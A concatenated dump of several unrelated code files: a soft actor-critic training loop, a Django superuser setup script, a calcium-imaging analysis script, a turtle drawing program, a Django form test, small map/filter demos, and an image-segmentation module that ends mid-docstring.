            logger.store(EpRet=ep_ret, EpLen=ep_len)
            o, ep_ret, ep_len = env.reset(), 0, 0
        if step >= update_after and step % update_every == 0:
            # One gradient step per environment step, batched together.
            for j in range(update_every):
                def update():
                    o, a, r, next_o, d = buf.sample_batch(batch_size)
                    # Compute targets
                    with torch.no_grad():
                        next_a, logp = policy(next_o)
                        assert next_a.shape == (batch_size, act_dim)
                        # Entropy term
                        ent = - alpha * logp
                        # Clipped Double Q-Learning
                        next_q_targ_1 = q_function_target_1(next_o, next_a)
                        next_q_targ_2 = q_function_target_2(next_o, next_a)
                        next_q_targ = torch.min(next_q_targ_1, next_q_targ_2)
                        q_targ = r + gamma * (1 - d) * (next_q_targ + ent)
                    # Update Q functions
                    q_optimizer.zero_grad()
                    q_loss_1 = ((q_function_1(o, a) - q_targ)**2).mean()
                    q_loss_2 = ((q_function_2(o, a) - q_targ)**2).mean()
                    q_loss = q_loss_1 + q_loss_2
                    q_loss.backward()
                    q_optimizer.step()
                    # Freeze Q-network so you don't waste computational effort
                    # computing gradients for it during the policy learning step.
                    for p in q_params:
                        p.requires_grad = False
                    # Policy function update
                    policy_optimizer.zero_grad()
                    a_bar, logp = policy(o)
                    ent = - alpha * logp
                    q_1 = q_function_1(o, a_bar)
                    q_2 = q_function_2(o, a_bar)
                    q = torch.min(q_1, q_2)
                    policy_loss = -(q + ent).mean()
                    policy_loss.backward()
                    policy_optimizer.step()
                    # Unfreeze Q-network so you can optimize it at next step.
                    for p in q_params:
                        p.requires_grad = True
                    # Update target networks with polyak
                    with torch.no_grad():
                        for q, q_targ in zip(q_function_1.parameters(), q_function_target_1.parameters()):
                            q_targ.data.mul_(polyak)
                            q_targ.data.add_((1 - polyak) * q.data)
                        for q, q_targ in zip(q_function_2.parameters(), q_function_target_2.parameters()):
                            q_targ.data.mul_(polyak)
                            q_targ.data.add_((1 - polyak) * q.data)
                update()
        if (step + 1) % steps_per_epoch == 0:
            epoch = (step + 1) // steps_per_epoch
            # Save model
            if (epoch % save_freq == 0) or (epoch == epochs):
                logger.save_state({'env': env}, None)
            # Test the performance of the deterministic version of the agent.
            def test_agent():
                with torch.no_grad():
                    for j in range(num_test_episodes):
                        o, d, ep_ret, ep_len = test_env.reset(), False, 0, 0
                        while not(d or (ep_len == max_ep_len)):
                            # Take deterministic actions at test time
                            a, _ = policy(torch.tensor(o, dtype=torch.float32).unsqueeze(0), deterministic=True)
                            assert a.shape == (1, act_dim)
                            a = a[0]  # Remove batch dimension
                            a = a.numpy()  # Convert to numpy
                            o, r, d, _ = test_env.step(a)
                            ep_ret += r
                            ep_len += 1
                        logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)
            test_agent()
            # Log info about epoch
            logger.log_tabular('Epoch', epoch)
            logger.log_tabular('EpRet', with_min_and_max=True)
            logger.log_tabular('EpLen', average_only=True)
            logger.log_tabular('TestEpRet', with_min_and_max=True)
            logger.log_tabular('TestEpLen', average_only=True)
            logger.log_tabular('TotalEnvInteracts', step)
            logger.log_tabular('Time', time.time()-start_time)
            logger.dump_tabular()
|
990,973 | c86b9a251675f2ac107bfc8f881ea7e35c4fc47a | import django
import json
import os, sys
# Point Django at the project settings before touching mongoengine's auth
# models, then create and persist an active superuser account.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bibstat.settings")
from django.conf import settings
from mongoengine.django.auth import User
# NOTE(review): email/username/password are blank placeholders -- fill them
# in before running this script.
user = User.create_user(email = '',
                        username = '',
                        password = '')
user.is_active = True
user.is_staff = True
user.is_superuser = True
user.save()
print(user)
|
990,974 | 3d716886653bcd2390eda507fe5daf993e1fe537 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 11 19:44:20 2017
@author: jcoleman
"""
# Coleman lab modules - combine into a single class?
from calcium import OpenStepCalcium as OSC
from calcium import calcium_imaging_data_fast as cidfast
from calcium import open_calcium_data_fast as ocdfast
from calcium import StepCodeFile as SCF
# Python modules
import numpy as np
from collections import OrderedDict
import cPickle as pickle
#==============================================================================
#Get step code file (*.bin), TIF image, ROI.zip files
#==============================================================================
#fileDirectoryTS = 'F:/coleman lab/jasonc/thygcamp6s_test2/'
#fileDirectory = 'F:/coleman lab/jasonc/thygcamp6s_test2/'
#fileDirectory = '/Users/jcoleman/Documents/--DATA--/in vivo gcamp analysis/thygcamp6s_LT4(9-10-17)/'
fileDirectory = '/Users/jcoleman/Documents/--DATA--/in vivo gcamp analysis/thygcamp6s_D4 5Hz (9-30-17)/'

# Which recording session to analyse; must be a key of _RECORDING_FILES.
datafile = 'D4_001_Z1_hz1'

# (step-code .bin, STD projection image, ROI zip) triple per recording.
# BUG FIX: the original if-chain tested 'D4_001_Z1_hz1' twice -- first
# assigning the D2 session's files, then overwriting them with the D4 files --
# so only the later (D4) triple ever took effect; the shadowed duplicate
# entry has been removed here.
_RECORDING_FILES = {
    'D3_001_Z1t1_hz05': ('mThy6s_001_D3_6_data.bin',
                         'STD_mThy6s2_alldrift_D3_001Z1.tif',
                         'mThy6s2_alldrift_D3_001Z1_ROI.zip'),
    'D3_001_Z1t2_hz05': ('mThy6s_001_D3Z1t2_13_data.bin',
                         'STD_mThy6s2_alldrift_D3_001Z1t2.tif',
                         'mThy6s2_alldrift_D3_001Z1t2_ROI.zip'),
    'D4_001_Z1_hz1': ('mThy6s_001_D4Z1_2_data.bin',
                      'STD_mThy6s2_alldrift_D4_001Z1.tif',
                      'mThy6s2_alldrift_D4_001Z1_ROI.zip'),
    'D4_001_Z1_hz5': ('mThy6s_001_D4Z1hz5_5_data.bin',
                      'STD_mThy6s2_alldrift_D4_001Z1hz5.tif',
                      'mThy6s2_alldrift_D4_001Z1hz5_ROI.zip'),
    'D4_002_Z1_hz1': ('mThy6s_002_D4Z1_3_data.bin',
                      'STD_mThy6s2_alldrift_D4_002Z1.tif',
                      'mThy6s2_alldrift_D4_002Z_ROI.zip'),
    'D4_002_Z1_hz5': ('mThy6s_002_D4Z1hz5_4_data.bin',
                      'STD_mThy6s2_alldrift_D4_002Z1hz5.tif',
                      'mThy6s2_alldrift_D4_002Zhz5_ROI.zip'),
}
fileBin, imgname, roizipname = _RECORDING_FILES[datafile]
# parameters for the multiPlot function below: one row per ROI, one column
# per stimulus orientation
import readroi as roizip
# Read the FIJI/ImageJ ROI zip that matches the selected recording.
a=roizip.read_roi_zip(fileDirectory + roizipname)
rows = len(a) # number of ROIs
cols = 8 # number of distinct stims
# ---------------------------------------------------------------------------
# PARAMETERS
# ---------------------------------------------------------------------------
daqRecordingFreq = 1000.0   # DAQ sampling rate (Hz)
stimList = [0, 45, 90, 135, 180, 225, 270, 315]   # drifting-grating angles (deg)
csvfiletype = 3             # 3 = FIJI/ImageJ csv intensity file

# Konnerth-lab dF/F + EWMA time constants.  For a 30 Hz imaging system the
# recommended setup (empirical note in the Nature protocol) is
# t_0 = 0.2, t_1 = 0.75, t_2 = 3.
t_0 = 0.2                   # 0.2 for 30 fps; 0.8 for 7.6 fps
t_1 = 0.75
t_2 = 3
mpmSamplingFreq = 30        # approximate 2-photon frame rate (fps)

gray_offset = 7.0           # gray time between stims (seconds)
# Window for averaging pre-stim gray (207 frames = 7 s at 30 fps);
# 207 - 30 keeps the final 1 s before stimulus onset.
pre_timewindow = 207 - 30
#==============================================================================
# Begin decoding and data extraction
#==============================================================================
# Decode the DAQ step-code file.  NOTE(review): the meaning of the two 8s is
# defined by SCF.StepCodeFile (bits/channels?) -- confirm against that class.
code_file = SCF.StepCodeFile(fileDirectory+fileBin,8,8,1000)
# Stimulus on/off timestamp pairs keyed by grating angle.
stims = code_file.get_stim_angles(stimList)
# Imaging-frame onset timestamps (channel 2 of the decoded timestamps).
Bframes = [ts[0] for ts in code_file.timestamps[2]]
#get intensity file
cellsraw, cellsmean, areas, xycoords, Data = ocdfast.openData(csvfiletype)
datatype = 'raw' # use raw IntDen/Area data, for normalizing to visual stim
#datatype = 'filtered' # use EWMA smoothing, etc
# Run Konnerth lab deltaF/F and EWMA filter - USAGE: (cells = raw intensity data)
# calculate DeltaF/F
#if datatype == 'filtered':
dff, dff_ewma, dff_offset = cidfast.run_deltaf_ewma(cellsmean, t_0, t_1, t_2, mpmSamplingFreq)
#cells = deepcopy(dff_ewma)
# Filter raw data - use for deltaF/F below (using pre-gray 1s as f0)
#elif datatype == 'raw':
#cells = deepcopy(cellsmean)
cells = list()
#lo-pass filter for raw data: butter_lowpass_filter(data,cutoff_freq,sampling_freq,order)
# NOTE(review): if mpmSamplingFreq != 30 this loop only prints a warning and
# leaves `cells` empty, which will break everything downstream -- confirm
# whether that is intended as a hard guard.
for cell in range(len(cellsmean)):
    if mpmSamplingFreq == 30:
        lopass_temp = OSC.butter_lowpass_filter(cellsmean[cell],1.0,mpmSamplingFreq,1)
        cells.append(lopass_temp)
    elif mpmSamplingFreq != 30:
        print('Enter correct sampling frequency (mpmSamplingFreq) for butter_lowpass_filter')
handler = cidfast.FileHandler()
#makes dictionary of [cellnumber][orientation][block]
# Convert the gray period from seconds to DAQ ticks (timestamps are in ticks
# at daqRecordingFreq = 1000 Hz).
gray_offset *= daqRecordingFreq
# Per-cell, per-orientation, per-repeat storage for the stimulus-period trace,
# the preceding gray-period trace, and their frame-index ranges.
response_rawdata = OrderedDict()
grays = OrderedDict()
response_indices = OrderedDict()
grays_indices = OrderedDict()
for cell in range(len(cells)):
    response_rawdata[cell] = OrderedDict()
    grays[cell] = OrderedDict()
    response_indices[cell] = OrderedDict()
    grays_indices[cell] = OrderedDict()
    for stim in stims:
        response_rawdata[cell][stim] = list()
        grays[cell][stim] = list()
        response_indices[cell][stim] = list()
        grays_indices[cell][stim] = list()
        for ts in stims[stim]:
            # Stimulus on/off timestamps for this repeat (DAQ ticks).
            begin = float(ts[0])
            end = float(ts[1])
            # Snap each event time to the nearest imaging-frame timestamp.
            begin_frame_time = handler.get_nearest(begin, Bframes)
            begin_gray_time = handler.get_nearest(begin - gray_offset, Bframes)
            end_frame_time = handler.get_nearest(end, Bframes)
            # The gray period ends exactly where the stimulus begins.
            end_gray_time = handler.get_nearest(begin, Bframes)
            # Translate frame timestamps into frame indices.
            begin_frame = list(Bframes).index(begin_frame_time)
            begin_gray = list(Bframes).index(begin_gray_time)
            end_frame = list(Bframes).index(end_frame_time)
            end_gray = list(Bframes).index(end_gray_time)
            # Slice the low-pass-filtered fluorescence trace for this repeat.
            chunk = cells[cell][int(begin_frame):int(end_frame)]
            gray_chunk = cells[cell][int(begin_gray):int(end_gray)]
            response_rawdata[cell][stim].append(chunk)
            grays[cell][stim].append(gray_chunk)
            response_indices[cell][stim].append([int(begin_frame),int(end_frame)])
            grays_indices[cell][stim].append([int(begin_gray),int(end_gray)])
#example: plots all 5 block of degree 45 orientation for cell 0
#cell_0_45 = response_rawdata[0][45]
#
#for block in cell_0_45:
#
# plt.plot(block)
# Calculate deltaF/F by block using mean of 1s pre-gray for each stim for f0 (where ft = fluorescence at time t)
# First, get 1s pre-stim gray data and store in dictionary: pre1sgray[cell][orientation][block]
pre1sgray_data = OrderedDict()
for cell in grays:
    pre1sgray_data[cell] = OrderedDict()
    for orientation in grays[cell]:
        pre1sgray_data[cell][orientation] = OrderedDict()
        for block in range(len(grays[cell][orientation])):
            # NOTE(review): `end` here is the float DAQ timestamp left over
            # from the extraction loop above, not a frame index; slicing a
            # numpy array with a float stop fails on modern numpy and this
            # was probably meant to be [pre_timewindow:] -- confirm before
            # changing.
            pre1sgray_data[cell][orientation][block] = grays[cell][orientation][block][pre_timewindow:end]
# Second, store deltaF/F response data: response_data[cell][orientation][block]
response_data = OrderedDict()
for cell in pre1sgray_data:
    response_data[cell] = OrderedDict()
    for orientation in pre1sgray_data[cell]:
        response_data[cell][orientation] = OrderedDict()
        for block in range(len(pre1sgray_data[cell][orientation])):
            # f0 = mean of the 1 s pre-stim gray for this repeat;
            # dF/F = (ft - f0) / f0
            tempmean = np.mean(pre1sgray_data[cell][orientation][block])
            response_data[cell][orientation][block] = (response_rawdata[cell][orientation][block] - tempmean) / tempmean
# Third, store deltaF/F response data for gray 1s: pre1sgray_data[cell][orientation][block]
pre1sgray_dFoF_data = OrderedDict()
for cell in pre1sgray_data:
    pre1sgray_dFoF_data[cell] = OrderedDict()
    for orientation in pre1sgray_data[cell]:
        pre1sgray_dFoF_data[cell][orientation] = OrderedDict()
        for block in range(len(pre1sgray_data[cell][orientation])):
            tempmean = np.mean(pre1sgray_data[cell][orientation][block])
            # Same dF/F normalisation applied to the gray chunk itself
            # (baseline fluctuation around its own mean).
            pre1sgray_dFoF_data[cell][orientation][block] = (pre1sgray_data[cell][orientation][block] - tempmean) / tempmean
#for ori in response_data[26]:
#
# cell_0_x = response_data[26][ori]
# plt.subplots()
#
# for block in cell_0_x:
#
# plt.plot(cell_0_x[block])
# tempvals = list()
# for i in range(len(cell_0_x)):
# tempvals.append(cell_0_x[i][0:147])
# tempmean = np.mean(tempvals,axis=0)
# plt.plot(tempmean, lw=3, c='k')
#Third, for plotting: concatenate pre1sgray_data:response_data:post3sgray_data
#response_prepost_data[cell][orientation][block] = np.concatenate((pre1sgray_data[cell][orientation][block], response_data[cell][orientation][block]), axis=0)
pre_response_post_data = OrderedDict()
for cell in pre1sgray_data:
    pre_response_post_data[cell] = OrderedDict()
    for orientation in pre1sgray_data[cell]:
        pre_response_post_data[cell][orientation] = OrderedDict()
        for block in range(len(pre1sgray_data[cell][orientation])):
            # Raw pre-stim gray and raw stimulus response, concatenated in
            # time, then dF/F-normalised against the pre-gray mean below.
            pre_temp = pre1sgray_data[cell][orientation][block]
            response_temp = response_rawdata[cell][orientation][block]
            #need to figure out how to get gray after each ORI (use stim indices to get 0:30 gray "chunk" after stim)
            #post_temp = grays[cell][orientation][block][0:30:end]
            concat_prestim_temp = np.concatenate((pre_temp, response_temp),axis=0)
            #concat_prestimpost_temp = np.concatenate((concatprestim_temp, ???),axis=0)
            tempmean = np.mean(pre1sgray_data[cell][orientation][block])
            pre_response_post_data[cell][orientation][block] = (concat_prestim_temp - tempmean) / tempmean
#for ori in pre_response_post_data[26]:
#
# cell_0_x = pre_response_post_data[26][ori]
# plt.subplots()
#
# for block in cell_0_x:
#
# plt.plot(cell_0_x[block])
#
# tempvals = list()
#
# for i in range(len(cell_0_x)):
#
# tempvals.append(cell_0_x[i][0:147])
#Gets response averages and pre-stim response averages
# For each cell x orientation: truncate all repeats to the shortest one, then
# average across repeats (blocks) to get a single mean trace.
response_avgs = OrderedDict()
pre_response_post_avgs = OrderedDict()
pregray1s_response_avgs = OrderedDict()
for cell in response_data:
    response_avgs[cell] = OrderedDict()
    pre_response_post_avgs[cell] = OrderedDict()
    pregray1s_response_avgs[cell] = OrderedDict()
    for orientation in response_data[cell]:
        # .values() works here because the per-block dicts are OrderedDicts
        # keyed 0..n-1, so repeats come out in block order.
        cell_ori = response_data[cell][orientation].values()
        cell_ori_long = pre_response_post_data[cell][orientation].values()
        cell_ori_gray1s = pre1sgray_dFoF_data[cell][orientation].values()
        #trim signals down to shortest length for averaging
        min_chunk_length = min([len(x) for x in cell_ori])
        cell_ori = [x[0:min_chunk_length] for x in cell_ori]
        min_chunk_length_long = min([len(x) for x in cell_ori_long])
        cell_ori_long = [x[0:min_chunk_length_long] for x in cell_ori_long]
        min_chunk_length_gray1s = min([len(x) for x in cell_ori_gray1s])
        cell_ori_gray1s = [x[0:min_chunk_length_gray1s] for x in cell_ori_gray1s]
        # Stack repeats into (n_blocks, n_frames) and average over repeats.
        A = np.array(cell_ori)
        Along = np.array(cell_ori_long)
        Agray = np.array(cell_ori_gray1s)
        B = np.mean(A, axis = 0)
        Blong = np.mean(Along, axis = 0)
        Bgray = np.mean(Agray, axis = 0)
        response_avgs[cell][orientation] = B
        pre_response_post_avgs[cell][orientation] = Blong
        pregray1s_response_avgs[cell][orientation] = Bgray
#example: plots all 45 degree responses
#for cell in response_avgs:
# plt.plot(response_avgs[cell][45])
#example: plots all orientations for cell 10
#for ori in response_avgs[10]:
# plt.plot(response_avgs[0][ori])
# stim_onsetframes, grays_onsetframes = getOnsetIndices(response_indices, grays_indices)
# use for plotting t1 vs t2 responses over time, etc
# Per-orientation response means; used for t1-vs-t2 response plots.
responses_means = OSC.get_ori_responses(response_avgs)
# use Mann-Whitney U to compare each cell's orientation response (full mean trace) to corresponding pre-gray (full mean trace)
#get all orienation response means for a given cell
#cell = 6
stimwindow = 145   # frames of the stimulus window used in the comparison
pthresh = 0.05     # significance threshold for the Mann-Whitney U test
togglePlot = 0 # recommended ONLY for troubleshooting (creates #cells x 8 figures)
#all_response_indices=get_response(response_avgs, pregray1s_response_avgs, pre_response_post_avgs, stimwindow, pthresh, togglePlot)
all_response_indices = OSC.get_response(response_avgs, pregray1s_response_avgs, pre_response_post_avgs, stimwindow, pthresh, togglePlot)
# pull out first ~60sec (1700 frames) of gray
gray_frames = list()
for cell in range(len(dff_ewma)):
    temp_gray = (dff_ewma[cell][0:1700])
    gray_frames.append(temp_gray)
# Run some functions
# Save all variables from the session; to load --> >>> dill.load_session(fileDirectory+filenamepkl)
# Derive output filenames from the ROI zip name.
filenamedill = roizipname.replace('ROI.zip','SESSION.pkl')
filenamepkl = roizipname.replace('ROI.zip','VARS.pickle')
#dill.dump_session(fileDirectory+'RAW_'+filenamepkl)
# Pickle specific variables for response t1 vs. t2, etc plotting
# obj0, obj1, obj2 are created here...
# Saving the objects:
# NOTE(review): text mode 'w' only works with cPickle on Python 2 (this
# script imports cPickle); the inline comment already flags 'wb' for Py3.
with open(fileDirectory+filenamepkl, 'w') as f: # Python 3: open(..., 'wb')
    pickle.dump({'response_avgs':response_avgs, 'pregray1s_response_avgs':pregray1s_response_avgs,
                 'pre_response_post_avgs':pre_response_post_avgs,
                 'responses_means':responses_means, 'stimwindow':stimwindow, 'pthresh':pthresh,
                 'all_response_indices':all_response_indices}, f)
#==============================================================================
#OSC.tracePlot(gray_frames, response_indices, grays_indices)
# Overlay responsive ROIs on the STD projection, then plot the per-ROI,
# per-orientation mean traces (rows = ROIs, cols = 8 orientations).
OSC.plotStack(fileDirectory, imgname, roizipname, all_response_indices)
OSC.multiPlot(pre_response_post_avgs,rows, cols,range(0,rows),[-0.5,1.0], 207-pre_timewindow,
              all_response_indices)
|
990,975 | 5dbae4d97e53d04e4c2390a67ec248fa9da2496f | import turtle as trtl
import random
t = trtl.Turtle()

# Start below the visible area and step diagonally; the first shape is drawn
# at (-300, -300).
a = -400
b = -400
t.speed(5)
t.pensize(5)

# Pen colours to pick from at random.
# BUG FIX: the original used random.randrange(1, 8), whose upper bound is
# exclusive, so the eighth colour was unreachable -- and it was misspelled
# "turqoise", which would have raised turtle.TurtleGraphicsError had it ever
# been selected.
COLORS = ["red", "blue", "green", "pink", "purple", "yellow", "orange",
          "turquoise"]

for x in range(5):
    # Move to the next diagonal grid position without drawing.
    a = a + 100
    b = b + 100
    t.penup()
    t.setposition(a, b)
    t.pendown()
    # One colour per position, shared by its five shapes.
    t.color(random.choice(COLORS))
    for _ in range(5):
        rsize = random.randrange(20, 150)   # radius of this shape
        # BUG FIX: randrange(1, 5) could never yield 5, so the 30-gon branch
        # below was dead code; the upper bound is now 6 (exclusive).
        shape = random.randrange(1, 6)
        t.begin_fill()
        if shape == 1:
            t.circle(rsize)                 # full circle
        elif shape == 2:
            t.circle(rsize, 360, 4)         # square
        elif shape == 3:
            t.circle(rsize, 360, 3)         # triangle
        elif shape == 4:
            t.circle(rsize, 360, 8)         # octagon
        else:
            t.circle(rsize, 360, 30)        # 30-gon (near-circle)
        t.end_fill()

wn = trtl.Screen()
wn.mainloop()
990,976 | b71f32279ec3cb0fd9f24098468d57686ae80256 | """
vega-admin module to test forms
"""
from django.test import TestCase, override_settings
from vega_admin.forms import ListViewSearchForm
class TestForms(TestCase):
    """
    Tests for vega_admin forms.
    """

    @override_settings(
        VEGA_LISTVIEW_SEARCH_QUERY_TXT="Search now",
        VEGA_LISTVIEW_SEARCH_TXT="Search!",
        VEGA_CRISPY_TEMPLATE_PACK="bootstrap3"
    )
    def test_listview_search_form(self):
        """
        ListViewSearchForm validates its input and renders the expected
        search-query markup.
        """
        form = ListViewSearchForm(data={'q': 'give me peanuts'})
        self.assertTrue(form.is_valid())
        expected_html = """
            <p>
            <label for="id_q">Search Query:</label>
            <input type="text" name="q" value="give me peanuts" id="id_q">
            </p>
            """
        self.assertHTMLEqual(expected_html, form.as_p())
|
# map/filter + lambda demos, rewritten with comprehensions.

# Squares of 1..9.
L = [n * n for n in range(1, 10)]
print(L)


def build(x, y):
    """Return a zero-argument callable that computes x*x + y*y lazily."""
    return lambda: x * x + y * y


L = build(1, 2)
print(L())

# Odd numbers in 1..19.
L = [n for n in range(1, 20) if n % 2 == 1]
print(L)
990,978 | 2a46896cd404638d9e382d2f086dd519c7a3898b | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import os
import shutil
import subprocess
from multiprocessing import Pool, Process, Queue, Manager
from PIL import Image
from scipy import ndimage
from skimage import feature, filters, measure, morphology, data, color
from skimage.transform import hough_circle, hough_circle_peaks
# high level
def applySegmentationSteps(input_img, input_mode, output_root, save_intermediate=False, overwrite=False):
    """ This is a convenience function to apply all my vision steps in one go.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param output_root: The filepath to the directory where outputs will be created.
    :type output_root: str
    :param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
    :type save_intermediate: bool
    :param overwrite: Flag to overwrite existing outputs, defaults to False.
        NOTE(review): currently unused by the implementation.
    :type overwrite: bool
    :return: Returns 0 if output successfully created, otherwise returns 1.
    :rtype: int
    """
    # BUG FIX: loadImage() was called unconditionally, which breaks in 'np'
    # mode (PIL cannot open a numpy array).  Only hit the disk in 'fp' mode.
    np_img = loadImage(input_img) if input_mode == 'fp' else input_img
    # The two original branches differed only in whether the distance and
    # ridge intermediates were written to disk; build the optional output
    # paths once instead of duplicating the whole pipeline.
    dist_path = output_root + '_distance.tif' if save_intermediate else None
    ridge_path = output_root + '_ridge.tif' if save_intermediate else None
    np_dist = getDistanceRaster(input_img, input_mode=input_mode, output_path=dist_path)
    np_ridge = ridgeDetection(np_dist, 'np', method='meijering', black_ridges=False, output_path=ridge_path)
    np_blobs = connectedComponentsImage(np_ridge, 'np', output_path=output_root + '_blobs.tif')
    exportBlobs(np_img, np_blobs, 'np', output_root)
    plt.imsave(output_root + 'blobs_cmap.png', np_blobs, cmap='nipy_spectral')
    # BUG FIX: the success probe used to test output_root + 'blobs_tif', a
    # path nothing ever writes, so the function always reported failure.
    # Check the blob raster that connectedComponentsImage actually saves.
    return 0 if os.path.exists(output_root + '_blobs.tif') else 1
def calculatePixelMetrics(input_img, input_df):
    """ Calculates pixel metrics for every detection in a dataframe.

    :param input_img: Image as a numpy array (passed to countPixels in 'np' mode).
    :type input_img: numpy array
    :param input_df: Dataframe with detections; must provide the columns
        'plot', 'x', 'y', 'r' and 'weight'.
    :type input_df: pandas dataframe
    :return: Returns the dataframe augmented with the per-detection pixel
        counts 'core', 'inner' and 'outer'.
    :rtype: pandas dataframe
    """
    new_cir = []
    for index, row in input_df.iterrows():
        plot = row['plot']
        x = row['x']
        y = row['y']
        r = row['r']
        weight = row['weight']
        core, inner, outer = countPixels(input_img, 'np', x, y, r)
        print(core, inner, outer)
        circle = ([plot, x, y, r, weight, core, inner, outer])
        new_cir.append(circle)
    print('circles added:', len(new_cir))
    # BUG FIX: rows are built as (..., core, inner, outer) but the header
    # previously labelled those columns 'outer', 'inner', 'core', silently
    # swapping the core and outer counts in the returned frame.
    header = ['plot', 'x', 'y', 'r', 'weight', 'core', 'inner', 'outer']
    output_df = pd.DataFrame(new_cir, columns=header)
    return output_df
# mid level
def getDistanceRaster(input_img, input_mode, output_path=None):
    """ Euclidean distance transform of a binary image.

    distance_transform_edt measures the distance to the nearest zero, hence
    the logical_not on the foreground mask.  See:
    https://stackoverflow.com/questions/44770396/how-does-the-scipy-distance-transform-edt-function-work

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param output_path: The filepath of the image to be saved; when given the
        normalised distance raster is also written to disk.
    :type output_path: str, optional
    :return: Returns numpy array of distances (or an (input_mode, message)
        tuple for an unrecognised mode).
    :rtype: numpy array
    """
    if input_mode == 'np':
        np_img = input_img
    elif input_mode == 'fp':
        np_img = loadImage(input_img)
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    np_dist = ndimage.distance_transform_edt(np.logical_not(np_img))
    if output_path is not None:
        saveImage(np_dist, output_path, mode='dist_norm')
    return np_dist
def getImageThreshold(input_img, input_mode, threshold, output_path=None):
    """ Takes either a string to an image or a np array as input and a float
    for thresholding. Supported input modes are: "np" (numpy array) or "fp"
    (filepath). Returns a thresholded image. If output path is applied, the
    thresholded raster will be saved.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param threshold: The comparison value for thresholding.
    :type threshold: int or float
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array of transformed image
    :rtype: numpy array
    """
    if input_mode == 'fp':
        np_img = loadImage(input_img)
    elif input_mode == 'np':
        np_img = input_img
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    # Vectorised replacement for the original per-pixel double loop: pixels
    # strictly below the threshold become 1, all others 0, preserving the
    # input dtype exactly as np.zeros_like + element assignment did -- but in
    # one C-level pass instead of O(rows*cols) Python iterations.
    np_thresh = np.where(np_img < threshold, 1, 0).astype(np_img.dtype)
    if output_path is not None:
        saveImage(np_thresh, output_path)
    return(np_thresh)
def edgeDetection(input_img, input_mode, sigma=1, output_path=None):
    """ Canny edge detection; default settings are tuned for thresholded
    images.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param sigma: Controls the scale of edge detection, defaults to 1.
    :type sigma: int
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array of detected edges (or an (input_mode,
        message) tuple for an unrecognised mode).
    :rtype: numpy array
    """
    if input_mode == 'np':
        np_img = input_img
    elif input_mode == 'fp':
        np_img = loadImage(input_img)
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    edges = feature.canny(np_img, sigma=sigma)
    if output_path is not None:
        saveImage(edges, output_path)
    return edges
def morphologicalCloseImage(input_img, input_mode, stel=50, output_path=None):
    """ Binary-close an image with a circular (disk) structuring element.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param stel: Radius of the disk structuring element, defaults to 50.
    :type stel: int
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array of the closed image (or an (input_mode,
        message) tuple for an unrecognised mode).
    :rtype: numpy array
    """
    if input_mode == 'np':
        np_img = input_img
    elif input_mode == 'fp':
        np_img = loadImage(input_img)
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    closed_img = morphology.binary_closing(np_img, morphology.disk(stel))
    if output_path is not None:
        saveImage(closed_img, output_path)
    return closed_img
def skeletonizeImage(input_img, input_mode, output_path=None):
    """ Reduce a binary image to its morphological skeleton.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array of the skeleton (or an (input_mode, message)
        tuple for an unrecognised mode).
    :rtype: numpy array
    """
    if input_mode == 'np':
        np_img = input_img
    elif input_mode == 'fp':
        np_img = loadImage(input_img)
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    skeleton = morphology.skeletonize(np_img)
    if output_path is not None:
        saveImage(skeleton, output_path)
    return skeleton
def connectedComponentsImage(input_img, input_mode, connectivity=1, output_path=None):
    """ Applies connected components labelling to an input image.

    :param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
    :type input_img: str or numpy array
    :param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
    :type input_mode: str
    :param connectivity: Controls the distance to connect components, defaults to 1.
    :type connectivity: int
    :param output_path: The filepath of the image to be saved.
    :type output_path: str, optional
    :return: Returns numpy array with the connected components.
    :rtype: numpy array
    """
    if input_mode == 'fp':
        np_img = loadImage(input_img)
    elif input_mode == 'np':
        np_img = input_img
    else:
        return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
    # Vectorised inversion (the original looped over every pixel in Python):
    # values below 0.5 become foreground (1), the rest background (0), with
    # the same dtype that np_img.copy() + element assignment produced.
    blobs = np.where(np_img < 0.5, 1, 0).astype(np_img.dtype)
    blobs_labels = measure.label(blobs, connectivity=connectivity)
    if output_path is not None:
        saveImage(blobs_labels, output_path, mode='blob_labels')
    return(blobs_labels)
def exportBlobs(input_img, input_blobs, input_mode, output_root):
    """ Export each connected-component blob as its own cropped image pair.

    input_img and input_blobs are opened with identical modes. Output is a
    directory containing base and blobs subdirectories. base holds the mask
